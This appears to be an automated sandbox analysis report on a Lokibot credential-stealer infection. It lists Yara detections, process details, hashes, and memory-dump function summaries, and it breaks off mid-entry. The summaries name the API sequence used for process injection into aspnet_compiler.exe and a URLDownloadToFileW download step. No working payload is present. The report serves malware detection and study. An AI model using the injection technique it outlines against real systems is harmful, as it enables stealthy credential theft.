Source: 00000009.00000002.2325175572.00000000065AF000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000009.00000002.2325175572.00000000065AF000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000009.00000002.2325175572.00000000065AF000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	12:14:29
Start date:	15/11/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
Imagebase:	0xc50000
File size:	56'368 bytes
MD5 hash:	FDA8C8F2A4E100AFB14C13DFCBCAB2D2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Loki_1, Description: Loki Payload, Source: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 0000000B.00000002.3274760441.0000000001298000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Function 067A0FE7 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2046351371.00000000067A0000.00000010.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_67a0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
Instruction ID: 626fac3bec459d70edd4d9991d0a3b730ce3cf43d2d5ca61c27259a86371ab76
Opcode Fuzzy Hash: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
Instruction Fuzzy Hash:

Function 067A0FDF Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2046351371.00000000067A0000.00000010.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_67a0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
Instruction ID: 626fac3bec459d70edd4d9991d0a3b730ce3cf43d2d5ca61c27259a86371ab76
Opcode Fuzzy Hash: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
Instruction Fuzzy Hash:

Function 067A0FD7 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2046351371.00000000067A0000.00000010.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_67a0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
Instruction ID: 626fac3bec459d70edd4d9991d0a3b730ce3cf43d2d5ca61c27259a86371ab76
Opcode Fuzzy Hash: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
Instruction Fuzzy Hash:

Function 067A0FCF Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2046351371.00000000067A0000.00000010.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_67a0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
Instruction ID: 626fac3bec459d70edd4d9991d0a3b730ce3cf43d2d5ca61c27259a86371ab76
Opcode Fuzzy Hash: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
Instruction Fuzzy Hash:

Analysis Process: powershell.exePID: 3160, Parent PID: 1264COMMON

Executed Functions

Function 03034BB0 Relevance: 2.0, APIs: 1, Instructions: 486COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2191763922.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3030000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec59a70bc0b1ea7eff2695ed3c22dd20bff5b932d8ab31649b2e237d7948c19b
Instruction ID: 98bf774b21dd75e365ed914396dc0a6df329ff0863738d2ba2b56593070d6c97
Opcode Fuzzy Hash: ec59a70bc0b1ea7eff2695ed3c22dd20bff5b932d8ab31649b2e237d7948c19b
Instruction Fuzzy Hash: 12223774A012199FCB05CF99C884AAEFBF6FF49310F298559E805AB361C735ED91CB90

Function 07781178 Relevance: 2.9, Strings: 2, Instructions: 441COMMON

Download Yara Rule

Strings

tP]q, xrefs: 077811B0
tP]q, xrefs: 077811BA

Memory Dump Source

Source File: 00000001.00000002.2205628846.0000000007780000.00000040.00000800.00020000.00000000.sdmp, Offset: 07780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7780000_powershell.jbxd

Similarity

API ID:
String ID: tP]q$tP]q
API String ID: 0-145478062
Opcode ID: 67f640373868eb7b87b001198f2c442859ed0b1b72ad71eec89ed111b513d134
Instruction ID: c4b8ffd864096a786d14b2b1da34a307a92f95780d61ed6ce3085966991af8cc
Opcode Fuzzy Hash: 67f640373868eb7b87b001198f2c442859ed0b1b72ad71eec89ed111b513d134
Instruction Fuzzy Hash: FEF115B0B102099FCB14AF6CD441A6ABBE2FBC9750F65886DE9499B340DF31DC42C7A1

Function 077804F8 Relevance: 2.7, Strings: 2, Instructions: 155COMMON

Download Yara Rule

Strings

tP]q, xrefs: 0778057E
tP]q, xrefs: 0778058A

Memory Dump Source

Source File: 00000001.00000002.2205628846.0000000007780000.00000040.00000800.00020000.00000000.sdmp, Offset: 07780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7780000_powershell.jbxd

Similarity

API ID:
String ID: tP]q$tP]q
API String ID: 0-145478062
Opcode ID: ff275736e1d48af8eee21ed62df9b6a8fd43023b9d4c94c2ca4cbc6be3ae0585
Instruction ID: 9e52d52c25f584c51eadd173ba2bb44436ab58ab2ac4fdbb703a724cd197bc3f
Opcode Fuzzy Hash: ff275736e1d48af8eee21ed62df9b6a8fd43023b9d4c94c2ca4cbc6be3ae0585
Instruction Fuzzy Hash: 655147B1714255AFCB106B68C810B2EBBE6EFC5710F25885AE588DF381CA71DC49C7B1

Function 03035130 Relevance: 1.6, APIs: 1, Instructions: 65filenetworkCOMMON

Download Yara Rule

APIs

URLDownloadToFileW.URLMON(?,00000000,00000000,?,00000001), ref: 030351C9

Memory Dump Source

Source File: 00000001.00000002.2191763922.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3030000_powershell.jbxd

Similarity

API ID: DownloadFile
String ID:
API String ID: 1407266417-0
Opcode ID: ec9a8683dd5baf30214174393f37366021259afe2d26f385da3cdba51df16f45
Instruction ID: 0f71348aac63e3e05f2d3f1fe7a3dc274260c8d54be48d9e6639772a4c021ec4
Opcode Fuzzy Hash: ec9a8683dd5baf30214174393f37366021259afe2d26f385da3cdba51df16f45
Instruction Fuzzy Hash: AE21F6B1D0125ADFCB00CF99D984ADEFBF4FB49310F14811AE918A7210D375AA54CFA1

Function 0778115D Relevance: 1.5, Strings: 1, Instructions: 238COMMON

Download Yara Rule

Strings

tP]q, xrefs: 077811B0

Memory Dump Source

Source File: 00000001.00000002.2205628846.0000000007780000.00000040.00000800.00020000.00000000.sdmp, Offset: 07780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7780000_powershell.jbxd

Similarity

API ID:
String ID: tP]q
API String ID: 0-2175968468
Opcode ID: 95fddb128fffcba4ac3b3cad88cd85c1443df89b0ccb62654181a9ced3a07449
Instruction ID: ba68c8ba53b3d808e1aec23a9da19125a9eaa0a6f151f81c8d10838be82154fc
Opcode Fuzzy Hash: 95fddb128fffcba4ac3b3cad88cd85c1443df89b0ccb62654181a9ced3a07449
Instruction Fuzzy Hash: 3391AFB0B502099FCB14EF48D540B6ABBF2FB84750F598959E9099B340DB31DC82CB91

Function 00E2D005 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2191414701.0000000000E2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E2D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e2d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 732ec689f9b6636ffcf2f48a8d2effa40962e8b00ccc6299e0862603eeb21759
Instruction ID: b9382883f3dff4a322d879feef6ebd9bfd4f247fc720d0e3e8bcb047073f8e54
Opcode Fuzzy Hash: 732ec689f9b6636ffcf2f48a8d2effa40962e8b00ccc6299e0862603eeb21759
Instruction Fuzzy Hash: A9018C6200E3C05ED7128B259C94A52BFB4DF53228F0DC0DBD9888F1A3C2695C49C772

Function 00E2D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2191414701.0000000000E2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E2D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e2d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19425c8d3f38e13693c5efa466d4ec6377c3a22f462319b623bdaab6f4b2f872
Instruction ID: 879531ee58d55ce7dde7dc57edb4a07127296c8ba3dbbb150d042d7764327d7a
Opcode Fuzzy Hash: 19425c8d3f38e13693c5efa466d4ec6377c3a22f462319b623bdaab6f4b2f872
Instruction Fuzzy Hash: B401F2714083149AE7108A29EDC4F67BFA8DF41328F28C41AEE486A296C2789C45C6B2

Non-executed Functions

Function 07780B70 Relevance: 5.2, Strings: 4, Instructions: 158COMMON

Download Yara Rule

Strings

$]q, xrefs: 07780D5A
4']q, xrefs: 07780C33
$]q, xrefs: 07780D4E
4']q, xrefs: 07780C27

Memory Dump Source

Source File: 00000001.00000002.2205628846.0000000007780000.00000040.00000800.00020000.00000000.sdmp, Offset: 07780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7780000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$$]q$$]q
API String ID: 0-978391646
Opcode ID: 95b3f77ca8f52626c05c75d9df736a9c64c143d37ac9cf49bcaa15c6f1a6b245
Instruction ID: d0bd8ac38444504e30f3bc54b34ef8cdb221afe868951e646cb482f8d92abcd2
Opcode Fuzzy Hash: 95b3f77ca8f52626c05c75d9df736a9c64c143d37ac9cf49bcaa15c6f1a6b245
Instruction Fuzzy Hash: 7B514AB174530ACFCB65AF28C4107AABBE2AFC2350F25886AD445CB351DB31D859C7A2

Function 07780080 Relevance: 5.0, Strings: 4, Instructions: 44COMMON

Download Yara Rule

Strings

4']q, xrefs: 077800F7
$]q, xrefs: 077800D6
4']q, xrefs: 077800EB
$]q, xrefs: 077800CA

Memory Dump Source

Source File: 00000001.00000002.2205628846.0000000007780000.00000040.00000800.00020000.00000000.sdmp, Offset: 07780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7780000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$$]q$$]q
API String ID: 0-978391646
Opcode ID: 1584b176a2c470bf5b42b0340a2c97493070f7dbc1f1b200977f7d3e07c47bd7
Instruction ID: 3678d518324cf31ed36eb7922786e78217f889fdb5071ae6525527ca544a35c4
Opcode Fuzzy Hash: 1584b176a2c470bf5b42b0340a2c97493070f7dbc1f1b200977f7d3e07c47bd7
Instruction Fuzzy Hash: 0A01266170C3854FC72A22295C302296FF2AFC2560B2A49EBC0D0DF297CA244C49C393

Analysis Process: powershell.exePID: 5732, Parent PID: 3160COMMON

Executed Functions

Function 047729F0 Relevance: .2, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2077765728.0000000004770000.00000040.00000800.00020000.00000000.sdmp, Offset: 04770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4770000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ef816e938804a3c5ebb40d94c2e906c0a6db7e98bd917e5bde4a15c4bdd920e
Instruction ID: 7dc1266d197d4d1e1d2687895805c174fa7d60c800a4ab074c6224d20b01cac3
Opcode Fuzzy Hash: 7ef816e938804a3c5ebb40d94c2e906c0a6db7e98bd917e5bde4a15c4bdd920e
Instruction Fuzzy Hash: D3918B74A002058FCB15CF59C4949AEFBF1FF48310B2585AAD865AB3A6C735FC51CBA0

Function 072A1C10 Relevance: .2, Instructions: 185COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2086295475.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_72a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d86be138a3c948d87a2c68cb144ecb3c520fb688551bb3b24261d9c96c7770f6
Instruction ID: c99c4df991e11a1ff604d680c7d5649d841797cd68081bb70762981c1e06aa4c
Opcode Fuzzy Hash: d86be138a3c948d87a2c68cb144ecb3c520fb688551bb3b24261d9c96c7770f6
Instruction Fuzzy Hash: 4E514BF0B2035AAFCB159B28851167ABBF69FD5720F1580A6C501EF285DB31CDA1C7A2

Function 072A1BF0 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2086295475.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_72a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b65760c14699f3076fd56a62b83ef9a964809dbb3eecc177d0096b14a2648305
Instruction ID: 53e9fbe75b1fff0bcb7ce8c578eb37340a525db259d7d2c20e3ba7a820390618
Opcode Fuzzy Hash: b65760c14699f3076fd56a62b83ef9a964809dbb3eecc177d0096b14a2648305
Instruction Fuzzy Hash: 0A4139F0A2035BEFCB158B248541A7A7BF6AF86730F0480A6C500EF295D731C9A1C7A2

Function 04774C20 Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2077765728.0000000004770000.00000040.00000800.00020000.00000000.sdmp, Offset: 04770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4770000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05b0be79d8f371db0eec850b7168ec2170621beab55ca752197c53f154f1e29f
Instruction ID: 31fa5f1b5be68d35831621c72954993bb61210071bdefc6d5adc9c66bc8af2e3
Opcode Fuzzy Hash: 05b0be79d8f371db0eec850b7168ec2170621beab55ca752197c53f154f1e29f
Instruction Fuzzy Hash: 5E41B67490A3959FCB02DF7CC8A059A7FF0AF4B300B0945CBD485DF2A3D625A949CBA5

Function 04772B00 Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2077765728.0000000004770000.00000040.00000800.00020000.00000000.sdmp, Offset: 04770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4770000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57c395a373366a1b22332874ca84cb29d05de3e98d38c2ef2d0b2bfb5d61b0cf
Instruction ID: b743e403eccffa0e2972cb52b857bd4d7aa7b8443672a96ea2832ed2fb9a0de5
Opcode Fuzzy Hash: 57c395a373366a1b22332874ca84cb29d05de3e98d38c2ef2d0b2bfb5d61b0cf
Instruction Fuzzy Hash: 31415A74A002059FCB09CF59C4989AEFBB1FF48310B6585A9D825AB365C736FC51CBA0

Function 04774C18 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2077765728.0000000004770000.00000040.00000800.00020000.00000000.sdmp, Offset: 04770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4770000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c4064be7a4f2b36529c06eca38243aa13f8558f9203cd7ee9f100883193ba3e
Instruction ID: 3292e4ce58d073da032126df304c6dd6b28a2bc823a52ac1ee717e9b689567b8
Opcode Fuzzy Hash: 7c4064be7a4f2b36529c06eca38243aa13f8558f9203cd7ee9f100883193ba3e
Instruction Fuzzy Hash: 3511D4B4A006099FCB04CF98D9809AEFBF1FF89310B158599E919AB352C731FD45CBA1

Function 00E1D005 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2077177103.0000000000E1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e1d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c7ef4c635815d419aac774b2dd2a760ab4b448a1091a72acf5d23e57244d8ae
Instruction ID: 3b06ae6966c6de0d3803e8ba53e083f548f6c9424aeee2694182f823c2bd73b0
Opcode Fuzzy Hash: 5c7ef4c635815d419aac774b2dd2a760ab4b448a1091a72acf5d23e57244d8ae
Instruction Fuzzy Hash: C601697140E3C05ED7128B258C94A92BFB49F53228F0980DBD8888F1A3C2689889C772

Function 00E1D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2077177103.0000000000E1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e1d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 588369ef3e0285b974b6be343908939995140adb6cca31a9431ea76b3c4b2a03
Instruction ID: c1f443179fdb0a462158b1bd53a38cbc5f23dcd88433c97b106587d6c8e94d38
Opcode Fuzzy Hash: 588369ef3e0285b974b6be343908939995140adb6cca31a9431ea76b3c4b2a03
Instruction Fuzzy Hash: 9801F271408300AAE7108E29CCC4BE7BF98DF49364F28C41AED486A286C37898C6C6B1

Non-executed Functions

Function 072A1270 Relevance: 9.2, Strings: 7, Instructions: 487COMMON

Download Yara Rule

Strings

$]q, xrefs: 072A1282
$]q, xrefs: 072A12B4
4']q, xrefs: 072A14E1
tP]q, xrefs: 072A12ED
tP]q, xrefs: 072A12F9
$]q, xrefs: 072A12A8
4']q, xrefs: 072A14D7

Memory Dump Source

Source File: 00000003.00000002.2086295475.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_72a0000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$tP]q$tP]q$$]q$$]q$$]q
API String ID: 0-108373575
Opcode ID: 65222e5e2d97a83e68eaf4118fe8dd90f608c490684e9283bcaf8cfb6f44a991
Instruction ID: 9004487900193f10382476c92b2d97d6dd7e7db598240e4451f5c8b5d286a4fe
Opcode Fuzzy Hash: 65222e5e2d97a83e68eaf4118fe8dd90f608c490684e9283bcaf8cfb6f44a991
Instruction Fuzzy Hash: 2CF115B1B2021AAFCB149B6C84116AABBF5AFD5730F14807BD545CF281DB31DDA1CB91

Function 072A04E0 Relevance: 9.1, Strings: 7, Instructions: 313COMMON

Download Yara Rule

Strings

4']q, xrefs: 072A05E3
tP]q, xrefs: 072A0739
$]q, xrefs: 072A06E8
tP]q, xrefs: 072A072D
$]q, xrefs: 072A06F4
$]q, xrefs: 072A06C2
4']q, xrefs: 072A05EF

Memory Dump Source

Source File: 00000003.00000002.2086295475.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_72a0000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$tP]q$tP]q$$]q$$]q$$]q
API String ID: 0-108373575
Opcode ID: 2114c777f3d81d3824ef18055744b41fa08ef13d51ac356bf1fff08804fd8d77
Instruction ID: ced3c45d13bd487a2e63b9e1a81ca689981e108634b0d01949e280cb1b9d7812
Opcode Fuzzy Hash: 2114c777f3d81d3824ef18055744b41fa08ef13d51ac356bf1fff08804fd8d77
Instruction Fuzzy Hash: 9EA135B1724356AFCB344A79881067ABBE5EFC6B20F18807BD545CB291EA31CC91C7A1

Function 072A1E50 Relevance: 5.4, Strings: 4, Instructions: 412COMMON

Download Yara Rule

Strings

4']q, xrefs: 072A1F58
4']q, xrefs: 072A20BA
4']q, xrefs: 072A20B0
4']q, xrefs: 072A1F4E

Memory Dump Source

Source File: 00000003.00000002.2086295475.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_72a0000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$4']q$4']q
API String ID: 0-1785108022
Opcode ID: ec693c5980ad0f56d93fc7f95b765c4b52285ba76bfe549c57b340b4571178d8
Instruction ID: 0e367bf16a314db37ec8ad90d2d6239fbd44da71ba50365db444b407ddc7f9ea
Opcode Fuzzy Hash: ec693c5980ad0f56d93fc7f95b765c4b52285ba76bfe549c57b340b4571178d8
Instruction Fuzzy Hash: 88D134B1724397EFCB158A68881076ABBF6AFD6720F1480BBD505CF282DB318991C791

Function 072A3228 Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

$]q, xrefs: 072A323A
$]q, xrefs: 072A3284
$]q, xrefs: 072A3256
$]q, xrefs: 072A3290

Memory Dump Source

Source File: 00000003.00000002.2086295475.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_72a0000_powershell.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q
API String ID: 0-858218434
Opcode ID: a2c831e1d4ffc110f99a8d92a86590a6d8f77a83b3232ca0c002778da0669caa
Instruction ID: 843fee6ac2f7e38d5259815de63ba206016d450cf98fd91c6051aa9436eada5c
Opcode Fuzzy Hash: a2c831e1d4ffc110f99a8d92a86590a6d8f77a83b3232ca0c002778da0669caa
Instruction Fuzzy Hash: 38210BB17343177BDB34956E8841B6BBBDA9BC5B10F24843A9945CB383DE72DC818361

Function 072A0308 Relevance: 5.0, Strings: 4, Instructions: 46COMMON

Download Yara Rule

Strings

$]q, xrefs: 072A0352
$]q, xrefs: 072A035E
4']q, xrefs: 072A0373
4']q, xrefs: 072A037F

Memory Dump Source

Source File: 00000003.00000002.2086295475.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_72a0000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$$]q$$]q
API String ID: 0-978391646
Opcode ID: 234302b546cb6593258cddc8a903acbf20bab3bccd91107d598185d130b3a1d0
Instruction ID: 99a4e1a66169619cef8e4a40da86e0f21a0dcc6c9106748d9f7584b3ca7759e4
Opcode Fuzzy Hash: 234302b546cb6593258cddc8a903acbf20bab3bccd91107d598185d130b3a1d0
Instruction Fuzzy Hash: B601A2A1729386AFC73A162808600696FB25F87A2072A41D7C081DF297DA684D468397

Analysis Process: powershell.exePID: 5948, Parent PID: 5560COMMON

Executed Functions

Function 0301D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2703204649.000000000301D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0301D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_301d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bad059e9be7e7292e384db8097a7cb72ff1b6ab3872ae6bb30058a7c13be8aa6
Instruction ID: fbfd396f83a0cae7dff34b82bc2d03d06a65de96b4f854d400b7fc374b09598f
Opcode Fuzzy Hash: bad059e9be7e7292e384db8097a7cb72ff1b6ab3872ae6bb30058a7c13be8aa6
Instruction Fuzzy Hash: 4001A271406340AEE751CA29DDC4B7BFFD8DF41364F1CC85AED480A246C7799856C6B1

Function 0301D007 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2703204649.000000000301D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0301D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_301d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f67938adcce8ee8cb02ba57e1758412d60185aefc3be8b51318a4f297c9d6a91
Instruction ID: aebd837e0ec13f5f6c326304d1407973175e998253537d079849deda9c4ce4e1
Opcode Fuzzy Hash: f67938adcce8ee8cb02ba57e1758412d60185aefc3be8b51318a4f297c9d6a91
Instruction Fuzzy Hash: 9A01407140E3C05ED7128B258C94B66BFB4DF43224F1D80DBD9888F1A7C2699849C772

Function 03093026 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2704473073.0000000003090000.00000040.00000800.00020000.00000000.sdmp, Offset: 03090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3090000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e8d555fb404b1396c84b131a8b0272deb440ad5c4d5807df5a34d09b9e94171
Instruction ID: 306a2848954e5ad7d84b566d7416db8ac389b6168ca3cf8e73a308d1564b51bd
Opcode Fuzzy Hash: 5e8d555fb404b1396c84b131a8b0272deb440ad5c4d5807df5a34d09b9e94171
Instruction Fuzzy Hash: E6F03A35A001049FCB04CF9DD890AEEF7B1FF88324F248199E515A72A0C336AC52CB50

Analysis Process: powershell.exePID: 5536, Parent PID: 5948COMMON

Execution Graph

Execution Coverage:	4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	88.5%
Total number of Nodes:	26
Total number of Limit Nodes:	1

Executed Functions

Function 0080A8C0 Relevance: 6.7, APIs: 4, Instructions: 665
memoryprocessthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,00000000,00003000,00000040), ref: 0080AB7A
VirtualAllocEx.KERNEL32(?,00000000,00000000,00003000,00000040), ref: 0080AC1C

Part of subcall function 00809438: WriteProcessMemory.KERNELBASE(?,00000000,00000000,18112514,00000000,?,?,?,00000000,00000000,?,0080AC7F,?,00000000,?), ref: 0080B4F4

ResumeThread.KERNELBASE(?), ref: 0080AE9F
CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,72B110FC,?), ref: 0080B204

Memory Dump Source

Source File: 00000009.00000002.2324005608.0000000000800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_800000_powershell.jbxd

Similarity

API ID: AllocProcessVirtual$CreateMemoryResumeThreadWrite
String ID:
API String ID: 4270437565-0
Opcode ID: 4d3d1833c34cebee1d859cbf8732dbbc2080c7f4d15628667b7f07909b6145b6
Instruction ID: 6dc9d2b2822f046b269d81034eaa38beccfc34867b952fdf639bbc1e90f58183
Opcode Fuzzy Hash: 4d3d1833c34cebee1d859cbf8732dbbc2080c7f4d15628667b7f07909b6145b6
Instruction Fuzzy Hash: B8426D70A002198FDB68DF69CC54B9EB7B2FF84304F1085A9E419EB291DB749E85CF52

Function 06F10B68 Relevance: 7.7, Strings: 6, Instructions: 175
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$]q, xrefs: 06F10C03
$]q, xrefs: 06F10BBF
$]q, xrefs: 06F10BDB
$]q, xrefs: 06F10BF7
$]q, xrefs: 06F10C21
$]q, xrefs: 06F10C15

Memory Dump Source

Source File: 00000009.00000002.2381151785.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

